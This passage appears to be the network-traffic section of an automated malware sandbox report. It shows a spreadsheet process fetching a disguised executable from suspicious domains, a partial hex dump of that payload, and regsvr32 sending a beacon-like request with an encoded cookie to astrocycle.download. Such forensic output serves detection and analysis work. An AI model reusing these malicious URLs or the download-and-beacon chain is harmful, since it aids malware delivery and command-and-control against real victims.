Jul 6, 2021 17:07:18.522488117 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.522582054 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:18.523371935 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.523401976 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.523525953 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:18.524302959 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.524322033 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.524446964 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:18.525191069 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.525207043 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.525307894 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:18.525964975 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.525981903 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.526027918 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.526046038 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.526101112 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:18.526611090 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.526628971 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.526632071 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:18.526756048 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:18.527439117 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.527456999 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.527563095 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:18.528950930 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.529031992 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.529113054 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:18.529252052 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.529270887 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.529349089 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:18.530121088 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.530138016 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.530208111 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:18.531034946 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.531054020 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.531110048 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:18.531922102 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.531936884 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.532005072 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:18.564568043 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.564621925 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.564666033 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.564722061 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:18.564883947 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.564925909 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.564961910 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:18.564981937 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.565087080 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:18.565720081 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.565782070 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.565826893 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.565908909 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:18.566572905 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.566643000 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.566690922 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.566745996 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:18.567421913 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.567477942 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.567526102 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.567564011 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:18.568202972 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.568254948 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.568284035 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:18.568336964 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.568455935 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:18.569047928 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.569102049 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.569154978 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.569171906 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:18.569884062 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.569931030 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.569988966 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.570010900 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:18.777563095 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:18.809542894 CEST	49169	80	192.168.2.22	104.21.37.209
Jul 6, 2021 17:07:18.848062992 CEST	80	49169	104.21.37.209	192.168.2.22
Jul 6, 2021 17:07:18.848228931 CEST	49169	80	192.168.2.22	104.21.37.209
Jul 6, 2021 17:07:18.849059105 CEST	49169	80	192.168.2.22	104.21.37.209
Jul 6, 2021 17:07:18.887347937 CEST	80	49169	104.21.37.209	192.168.2.22
Jul 6, 2021 17:07:19.395065069 CEST	80	49169	104.21.37.209	192.168.2.22
Jul 6, 2021 17:07:19.395132065 CEST	80	49169	104.21.37.209	192.168.2.22
Jul 6, 2021 17:07:19.395277977 CEST	49169	80	192.168.2.22	104.21.37.209
Jul 6, 2021 17:07:22.157747030 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:22.158102036 CEST	49169	80	192.168.2.22	104.21.37.209
Jul 6, 2021 17:09:15.741776943 CEST	49167	80	192.168.2.22	172.67.146.88
Jul 6, 2021 17:09:15.742083073 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 17:09:15.742417097 CEST	49165	80	192.168.2.22	104.21.52.111
Jul 6, 2021 17:09:15.782936096 CEST	80	49165	104.21.52.111	192.168.2.22
Jul 6, 2021 17:09:15.782955885 CEST	80	49167	172.67.146.88	192.168.2.22
Jul 6, 2021 17:09:15.783051014 CEST	49165	80	192.168.2.22	104.21.52.111
Jul 6, 2021 17:09:15.783066988 CEST	49167	80	192.168.2.22	172.67.146.88
Jul 6, 2021 17:09:15.783386946 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 17:09:15.783441067 CEST	49166	80	192.168.2.22	172.67.194.117

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 6, 2021 17:07:15.776822090 CEST	52197	53	192.168.2.22	8.8.8.8
Jul 6, 2021 17:07:15.838013887 CEST	53	52197	8.8.8.8	192.168.2.22
Jul 6, 2021 17:07:16.005678892 CEST	53099	53	192.168.2.22	8.8.8.8
Jul 6, 2021 17:07:16.066899061 CEST	53	53099	8.8.8.8	192.168.2.22
Jul 6, 2021 17:07:16.272126913 CEST	52838	53	192.168.2.22	8.8.8.8
Jul 6, 2021 17:07:16.331470966 CEST	53	52838	8.8.8.8	192.168.2.22
Jul 6, 2021 17:07:17.337893963 CEST	61200	53	192.168.2.22	8.8.8.8
Jul 6, 2021 17:07:17.398308039 CEST	53	61200	8.8.8.8	192.168.2.22
Jul 6, 2021 17:07:17.428981066 CEST	49548	53	192.168.2.22	8.8.8.8
Jul 6, 2021 17:07:17.486480951 CEST	53	49548	8.8.8.8	192.168.2.22
Jul 6, 2021 17:07:18.675292015 CEST	55627	53	192.168.2.22	8.8.8.8
Jul 6, 2021 17:07:18.730773926 CEST	53	55627	8.8.8.8	192.168.2.22
Jul 6, 2021 17:07:18.739815950 CEST	56009	53	192.168.2.22	8.8.8.8
Jul 6, 2021 17:07:18.807012081 CEST	53	56009	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jul 6, 2021 17:07:15.776822090 CEST	192.168.2.22	8.8.8.8	0x82b3	Standard query (0)	thousandsyears.download	A (IP address)	IN (0x0001)
Jul 6, 2021 17:07:16.005678892 CEST	192.168.2.22	8.8.8.8	0xe9da	Standard query (0)	voopeople.fun	A (IP address)	IN (0x0001)
Jul 6, 2021 17:07:16.272126913 CEST	192.168.2.22	8.8.8.8	0xfc39	Standard query (0)	uppercilio.fun	A (IP address)	IN (0x0001)
Jul 6, 2021 17:07:17.337893963 CEST	192.168.2.22	8.8.8.8	0x45a5	Standard query (0)	aws.amazon.com	A (IP address)	IN (0x0001)
Jul 6, 2021 17:07:17.428981066 CEST	192.168.2.22	8.8.8.8	0x6e2b	Standard query (0)	aws.amazon.com	A (IP address)	IN (0x0001)
Jul 6, 2021 17:07:18.675292015 CEST	192.168.2.22	8.8.8.8	0xa14d	Standard query (0)	astrocycle.download	A (IP address)	IN (0x0001)
Jul 6, 2021 17:07:18.739815950 CEST	192.168.2.22	8.8.8.8	0x8ff4	Standard query (0)	astrocycle.download	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jul 6, 2021 17:07:15.838013887 CEST	8.8.8.8	192.168.2.22	0x82b3	No error (0)	thousandsyears.download		104.21.52.111	A (IP address)	IN (0x0001)
Jul 6, 2021 17:07:15.838013887 CEST	8.8.8.8	192.168.2.22	0x82b3	No error (0)	thousandsyears.download		172.67.198.51	A (IP address)	IN (0x0001)
Jul 6, 2021 17:07:16.066899061 CEST	8.8.8.8	192.168.2.22	0xe9da	No error (0)	voopeople.fun		172.67.194.117	A (IP address)	IN (0x0001)
Jul 6, 2021 17:07:16.066899061 CEST	8.8.8.8	192.168.2.22	0xe9da	No error (0)	voopeople.fun		104.21.12.122	A (IP address)	IN (0x0001)
Jul 6, 2021 17:07:16.331470966 CEST	8.8.8.8	192.168.2.22	0xfc39	No error (0)	uppercilio.fun		172.67.146.88	A (IP address)	IN (0x0001)
Jul 6, 2021 17:07:16.331470966 CEST	8.8.8.8	192.168.2.22	0xfc39	No error (0)	uppercilio.fun		104.21.55.83	A (IP address)	IN (0x0001)
Jul 6, 2021 17:07:17.398308039 CEST	8.8.8.8	192.168.2.22	0x45a5	No error (0)	aws.amazon.com	tp.8e49140c2-frontier.amazon.com		CNAME (Canonical name)	IN (0x0001)
Jul 6, 2021 17:07:17.398308039 CEST	8.8.8.8	192.168.2.22	0x45a5	No error (0)	tp.8e49140c2-frontier.amazon.com	dr49lng3n1n2s.cloudfront.net		CNAME (Canonical name)	IN (0x0001)
Jul 6, 2021 17:07:17.398308039 CEST	8.8.8.8	192.168.2.22	0x45a5	No error (0)	dr49lng3n1n2s.cloudfront.net		13.224.92.73	A (IP address)	IN (0x0001)
Jul 6, 2021 17:07:17.486480951 CEST	8.8.8.8	192.168.2.22	0x6e2b	No error (0)	aws.amazon.com	tp.8e49140c2-frontier.amazon.com		CNAME (Canonical name)	IN (0x0001)
Jul 6, 2021 17:07:17.486480951 CEST	8.8.8.8	192.168.2.22	0x6e2b	No error (0)	tp.8e49140c2-frontier.amazon.com	dr49lng3n1n2s.cloudfront.net		CNAME (Canonical name)	IN (0x0001)
Jul 6, 2021 17:07:17.486480951 CEST	8.8.8.8	192.168.2.22	0x6e2b	No error (0)	dr49lng3n1n2s.cloudfront.net		13.224.92.73	A (IP address)	IN (0x0001)
Jul 6, 2021 17:07:18.730773926 CEST	8.8.8.8	192.168.2.22	0xa14d	No error (0)	astrocycle.download		104.21.37.209	A (IP address)	IN (0x0001)
Jul 6, 2021 17:07:18.730773926 CEST	8.8.8.8	192.168.2.22	0xa14d	No error (0)	astrocycle.download		172.67.213.115	A (IP address)	IN (0x0001)
Jul 6, 2021 17:07:18.807012081 CEST	8.8.8.8	192.168.2.22	0x8ff4	No error (0)	astrocycle.download		172.67.213.115	A (IP address)	IN (0x0001)
Jul 6, 2021 17:07:18.807012081 CEST	8.8.8.8	192.168.2.22	0x8ff4	No error (0)	astrocycle.download		104.21.37.209	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

thousandsyears.download

voopeople.fun

uppercilio.fun

astrocycle.download

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49165	104.21.52.111	80	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp	kBytes transferred	Direction	Data
Jul 6, 2021 17:07:15.893748999 CEST	0	OUT	GET /div/44376,8555986111.jpg HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: thousandsyears.download Connection: Keep-Alive
Jul 6, 2021 17:07:15.979367971 CEST	1	IN	HTTP/1.1 200 OK Date: Tue, 06 Jul 2021 15:07:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Cache-Control: max-age=14400 CF-Cache-Status: HIT Age: 4244 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=%2FFXDuhyr1H%2B8k9%2B6yg1V5Hl1W0Ch%2BC4t9DHwMRw1UbIM2ag9aCAbaixOEu%2B0yMay6b9EwtXSkMDg2I%2BuY8gdNPeXcPBzhctsCXJaC1l9pizx6sdpj7YYn2cnbAWPukCBGMo7rHI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 66a9bde08f1605d0-FRA Content-Encoding: gzip alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400 Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a Data Ascii: 14
Jul 6, 2021 17:07:15.979394913 CEST	1	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49166	172.67.194.117	80	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp	kBytes transferred	Direction	Data
Jul 6, 2021 17:07:16.112478018 CEST	2	OUT	GET /div/44376,8555986111.jpg HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: voopeople.fun Connection: Keep-Alive
Jul 6, 2021 17:07:16.212357044 CEST	3	IN	HTTP/1.1 200 OK Date: Tue, 06 Jul 2021 15:07:16 GMT Content-Type: application/octet-stream Content-Length: 57856 Connection: keep-alive Content-Disposition: attachment; filename=lsdfik.fml Cache-Control: max-age=14400 CF-Cache-Status: HIT Age: 4244 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=o1t60Q0Ft8jw%2BbLjpGzVHU1bm7lVN8wCMuOkpMc4Ff0%2Bi9DppJHkfdNcsUMepKim4lAeOdK7XhOgiYZd8RME5%2FV39JcmWlBpzVUcVCNTvvOFsudwXMUpnZ0eXw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 66a9bde1ea474e2b-FRA alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400 Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 09 8f f1 c7 4d ee 9f 94 4d ee 9f 94 4d ee 9f 94 3e 8c 9e 95 4e ee 9f 94 4d ee 9e 94 4b ee 9f 94 4d ee 9f 94 49 ee 9f 94 e8 87 9f 95 4c ee 9f 94 e8 87 9d 95 4c ee 9f 94 52 69 63 68 4d ee 9f 94 00 00 00 00 00 00 00 00 50 45 00 00 64 86 04 00 86 06 e4 60 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 00 00 00 3a 00 00 00 a4 00 00 00 00 00 00 20 13 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 01 00 00 04 00 00 f8 ba 01 00 01 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 a0 ec 00 00 fc 00 00 00 9c ed 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 28 38 00 00 00 10 00 00 00 3a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7e 9e 00 00 00 50 00 00 00 a0 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 00 00 00 00 f0 00 00 00 02 00 00 00 de 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 00 00 00 00 00 01 00 00 02 00 00 00 e0 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$MMM>NMKMILLRichMPEd`" : `(P@.text(8: `.rdata~P>@@.data`@.pdata
Jul 6, 2021 17:07:16.212430000 CEST	5	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: @@
Jul 6, 2021 17:07:16.212482929 CEST	6	IN	Data Raw: a4 00 00 00 23 02 00 00 8b 05 5a dc 00 00 89 44 24 4c c7 84 24 ac 00 00 00 0b 00 00 00 8b 05 49 dc 00 00 35 89 b4 5a f6 89 05 3e dc 00 00 c7 84 24 a8 00 00 00 17 00 00 00 48 8b 15 78 dc 00 00 8b 05 22 dc 00 00 41 89 c0 48 89 54 24 20 4c 89 c2 41 Data Ascii: #ZD$L$I5Z>$Hx"AHT$ LA0ALT$ AH<<H$HL$@$G$G$GHHD$0$GD$/$GHD$@L$?${HD$@HHD$@
Jul 6, 2021 17:07:16.212528944 CEST	7	IN	Data Raw: 00 00 00 48 8b 49 18 48 89 8c 24 a8 00 00 00 0f b7 84 24 b2 00 00 00 89 84 24 8c 01 00 00 48 8b 8c 24 a8 00 00 00 48 8b 49 20 48 89 4c 24 70 0f b7 84 24 b2 00 00 00 89 84 24 88 01 00 00 48 83 7c 24 70 00 0f 84 dc 06 00 00 0f b7 84 24 b2 00 00 00 Data Ascii: HIH$$$H$HI HL$p$$H\|$p$$HL$pHIPHL$h$$HL$pfQHf$$$\|HD$`$$xD$/$tHT$`$p$pALD$`D$/$lLD$hA
Jul 6, 2021 17:07:16.212565899 CEST	9	IN	Data Raw: f8 00 00 00 8b 44 24 34 83 c8 02 89 44 24 34 c7 84 24 f4 00 00 00 89 b4 5a f6 e9 e5 00 00 00 8b 84 24 84 00 00 00 8b 4c 24 44 81 f1 89 b4 5a f6 39 c8 0f 85 57 00 00 00 0f b7 84 24 b2 00 00 00 89 84 24 f0 00 00 00 48 8b 8c 24 a8 00 00 00 48 8b 94 Data Ascii: D$4D$4$Z$L$DZ9W$$H$H$HH$$D$4D$4$Zp$L$@Z9R$$H$H$HHw$$D$4D$4$
Jul 6, 2021 17:07:16.212600946 CEST	10	IN	Data Raw: a0 00 00 00 48 89 b4 24 60 03 00 00 48 8b b4 24 60 03 00 00 89 b4 24 6c 03 00 00 c7 84 24 84 00 00 00 00 00 00 00 8b 84 24 84 00 00 00 3b 84 24 80 00 00 00 0f 83 c4 00 00 00 48 8b 84 24 a0 00 00 00 48 89 84 24 50 03 00 00 48 8b 84 24 50 03 00 00 Data Ascii: H$`H$`$l$$;$H$H$PH$P$\HL$pHL$xH$H$@H$@$LLD$xILD$xL$L$0L$0D$<LL$pILL$pL$L$ L$ D$,$
Jul 6, 2021 17:07:16.212635040 CEST	12	IN	Data Raw: 84 24 a8 00 00 00 41 8b 48 28 41 89 c8 4c 01 c2 48 89 54 24 50 48 8b 54 24 50 48 89 94 24 d0 01 00 00 48 8b 94 24 d0 01 00 00 89 94 24 dc 01 00 00 48 83 7c 24 50 00 0f 84 27 00 00 00 48 8b 44 24 50 48 8b 8c 24 a0 00 00 00 48 8b 15 47 c7 00 00 89 Data Ascii: $AH(ALHT$PHT$PH$H$$H\|$P'HD$PH$HGL$(HDD$(E1H$H$TE1DHD$@HD$@H$H$$H;L$@qH$H$H$$HL$@DLHLHL$
Jul 6, 2021 17:07:16.212670088 CEST	13	IN	Data Raw: 00 00 48 8b 4c 24 38 0f b7 41 16 83 e0 01 83 f8 00 0f 84 31 00 00 00 8b 44 24 60 89 84 24 40 01 00 00 c6 44 24 67 00 48 8b 4c 24 68 48 89 8c 24 30 01 00 00 48 8b 8c 24 30 01 00 00 89 8c 24 3c 01 00 00 e9 3d 00 00 00 48 8b 44 24 68 48 89 84 24 20 Data Ascii: HL$8A1D$`$@D$gHL$hH$0H$0$<=HD$hH$ H$ $,D$gHL$hH$H$$D$`$HD$hH$H$$\|$`MD$`$HL$@AD$TD$T$D$TT$`)T$`D$`$
Jul 6, 2021 17:07:16.212703943 CEST	15	IN	Data Raw: 24 70 01 00 00 48 8b 84 24 70 01 00 00 89 84 24 7c 01 00 00 48 8b 4c 24 68 8b 01 89 c1 48 03 8c 24 88 00 00 00 48 89 4c 24 58 48 8b 4c 24 58 48 89 8c 24 60 01 00 00 48 8b 8c 24 60 01 00 00 89 8c 24 6c 01 00 00 48 8b 54 24 68 8b 42 10 89 c2 48 03 Data Ascii: $pH$p$\|HL$hH$HL$XHL$XH$`H$`$lHT$hBH$HT$@HT$@H$PH$P$\hH$$LHL$hAH$HL$XHL$XH$@H$@$HHT$XHT$@HT$@H$0H$0$<H$$,
Jul 6, 2021 17:07:16.212748051 CEST	16	IN	Data Raw: 89 c1 48 01 c8 48 89 44 24 30 48 8b 44 24 30 48 89 84 24 80 00 00 00 e9 70 00 00 00 48 8b 44 24 68 48 89 84 24 b8 00 00 00 48 8b 84 24 b8 00 00 00 89 84 24 c4 00 00 00 8b 44 24 4c 83 c0 01 89 44 24 4c e9 93 fe ff ff 48 8b 44 24 68 48 89 84 24 a8 Data Ascii: HHD$0HD$0H$pHD$hH$H$$D$LD$LHD$hH$H$$HD$hH$H$$H$H$HH$LL$`DD$\T$[HL$PD$<HL$PHL$pHL$pL$\|HL$PD$+HD$HH
Jul 6, 2021 17:07:16.213053942 CEST	17	IN	Data Raw: 00 48 8b 8c 24 a0 00 00 00 89 8c 24 ac 00 00 00 e9 63 ff ff ff 48 8b 44 24 30 48 89 84 24 90 00 00 00 48 8b 84 24 90 00 00 00 89 84 24 9c 00 00 00 48 8b 44 24 50 48 89 84 24 80 00 00 00 48 8b 84 24 80 00 00 00 89 84 24 8c 00 00 00 48 c7 44 24 68 Data Ascii: H$$cHD$0H$H$$HD$PH$H$$HD$hHD$hHHHT$HL$HD$HD$ HD$ D$,HL$H$H$$HD$H$H$$HL$HHHT$D$HL$H$H$

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.22	49167	172.67.146.88	80	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp	kBytes transferred	Direction	Data
Jul 6, 2021 17:07:16.376646042 CEST	65	OUT	GET /div/44376,8555986111.jpg HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: uppercilio.fun Connection: Keep-Alive
Jul 6, 2021 17:07:16.438361883 CEST	66	IN	HTTP/1.1 200 OK Date: Tue, 06 Jul 2021 15:07:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Cache-Control: max-age=14400 CF-Cache-Status: HIT Age: 4244 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=r0lZ00R5CdHFKSlBN4EjKT47vDNXjiugn03kKY4WT969hppVXlXCz9TXeG9HPh1FRKA1VlIihB0ddWNVQSxR0eWIzLDdRQ9%2Fir8LQJwQ5A%2Fgehe0lp5CfyNV1Pc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 66a9bde38db12bb9-FRA Content-Encoding: gzip alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400 Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a Data Ascii: 14
Jul 6, 2021 17:07:16.438410044 CEST	66	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.22	49169	104.21.37.209	80	C:\Windows\System32\regsvr32.exe

Timestamp	kBytes transferred	Direction	Data
Jul 6, 2021 17:07:18.849059105 CEST	324	OUT	GET / HTTP/1.1 Connection: Keep-Alive Cookie: __gads=3565085024:1:5223:56; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=373435343831:416C627573:36333131444230364634373530414536; __io=0; _gid=67AFEDC5AC03 Host: astrocycle.download
Jul 6, 2021 17:07:19.395065069 CEST	325	IN	HTTP/1.1 404 Not Found Date: Tue, 06 Jul 2021 15:07:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=Yj3elqj3Z0Xg0OIJCU%2BdOkJ2AxD9QT8Qrpl6gGiIG2Gf8JJNYHAO6EtGngIMkSOCWxORErzhgsKnmluqAuuaHRSpGmTjNDtgehRgmFZvbeBrue66WhdmYLezeLjqnWhcJw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 66a9bdf2fe32c2f4-FRA alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400 Data Raw: 31 31 31 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 